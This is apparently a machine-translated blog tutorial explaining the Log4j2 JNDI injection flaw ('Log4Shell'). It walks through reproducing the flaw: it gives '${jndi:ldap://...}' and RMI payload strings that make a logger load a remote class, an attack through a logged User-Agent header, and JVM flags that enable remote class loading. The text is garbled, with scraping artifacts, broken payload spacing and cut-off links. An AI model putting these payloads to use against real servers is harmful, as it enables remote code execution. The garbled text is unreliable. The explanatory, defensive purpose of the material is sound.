background

Log4j2 is a “nuclear bomb” vulnerability. This vulnerability is called a “nuclear bomb” vulnerability. This article takes you step by step to understand the principle of this vulnerability, how to use it and how to affect the scope of it.

Basic knowledge of

JAVA provides a powerful Lookup function that relies heavily on JNDI

JNDI is Java Naming and Directory Interface (Java Naming and Directory Interface), which provides a Directory system and associates service names with objects, enabling developers to access objects using names during development.

JNDI is just a top layer wrapper, and the bottom layer supports all kinds of access, including RMI and LDAP, which are often seen in other articles. For what RMI and LDAP are, you can see in other articles. It is simply a rich data source, passing in a name, and lookup back the corresponding object.

Vulnerability principle

For the following simple code,log4j2 resolves JNDI, loads classes by lookup, instantiates objects, and performs malicious logic (such as deleting files, etc.)

LOGGER.error("${jndi: ldap: / / 127.0.0.1:1389 / badClassName}");
Copy the code

Referring to common business code on the web, it is very likely that the application will print common attributes such as User-Agent, resulting in JNDI injection vulnerabilities

String userAgent = request.getHeader("User-Agent"); \ logger.info(userAgent);Copy the code

The attacker inUser-AgentFill in theThe ${jndi: ldap: / / 127.0.0.1:1389 / badClassName}, can constitute injection, visible its threshold of low

As you can see from the picture, the object of JNDI injection vulnerability can be RMI or LDAP, essentially because of the loading of remote code, allowing an attacker to take advantage of Java dynamic loading is a double-edged sword.

repeat

Reproduce the code github.com/sabersword/… , provides LDAP and RMI two ways to run ServerMain to start RMI Registry, LDAP Server and HTTP Server, and then run ClientMain again to restart the calculator

LOGGER.error("${jndi: ldap: / / 127.0.0.1:1389 / badClassName}");
LOGGER.error("${jndi: rmi: / / 127.0.0.1:1099 / badClassName}");
Copy the code

In addition to opening the calculator, can also execute any command, equivalent to the attacker has obtained the server as a user of all permissions, so extremely dangerous

Recurrence point of attention

Since trustURLCodebase, the ability to load remote classes, is turned off in some JDK versions, it is best to turn it on in ClientMain to reproduce:

-Dcom.sun.jndi.ldap.object.trustURLCodebase=true  
-Dcom.sun.jndi.rmi.object.trustURLCodebase=true
Copy the code

The specific JDK version is as follows. Source:xz.aliyun.com/t/6633

conclusion

4ra1n.love/post/hbHrd-… , and then combined with their own understanding and practice, write this article is not to teach you how to attack, but hope that we understand the vulnerability harm, recognize the weaknesses of the system, build a more secure system, mutual encouragement